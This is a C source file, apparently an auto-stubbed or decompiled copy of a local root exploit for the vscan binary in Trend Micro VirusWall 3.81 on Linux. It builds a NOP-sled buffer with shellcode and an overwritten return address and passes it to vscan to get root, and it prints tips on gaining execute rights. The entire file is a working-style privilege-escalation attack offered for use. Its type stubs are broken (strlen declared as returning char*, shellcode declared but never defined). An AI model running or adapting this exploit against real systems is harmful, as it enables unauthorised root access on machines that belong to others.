
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int NOP ;
 int access (char*,int) ;
 int execl (char*,char*,char*,int *) ;
 int exit (int) ;
 unsigned long get_sp () ;
 int getuid () ;
 scalar_t__ malloc (int) ;
 int memcpy (int,int ,char*) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int shellcode ;
 char* strlen (int ) ;
 char* vscan ;

int main(int argc, char *argv[], char **envp) {


    int buff = 1120;


    unsigned long addr;


    char *ptr;

    printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)\n");
    printf("Author: Sebastian Wolfgarten, <sebastian@wolfgarten.com>\n");
    printf("Date: January 3rd, 2007\n\n");


    if (access(vscan, 01) != -1) {

        printf("Okay, %s is executable and by the way, your current user id is %d.\n",vscan,getuid());


        if((ptr = (char *)malloc(buff)) == ((void*)0)) {

  printf("Error allocating memory!\n");
  exit(-1);

 }


        addr = get_sp();


        memset(ptr, NOP, buff);


        memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode));


        *(long *)&ptr[buff - 4] = addr;


        printf("\nExecuting %s. Afterwards check your privilege level with id or whoami!\n",vscan);
        execl(vscan, "vscan", ptr, ((void*)0));

    } else {

        printf("Exploit failed. You seem not to have enough privileges to execute %s, sorry.\n",vscan);
 printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.\n");
 printf("Then try again :-)\n\n");
 exit(1);

    }

    return 0;

}
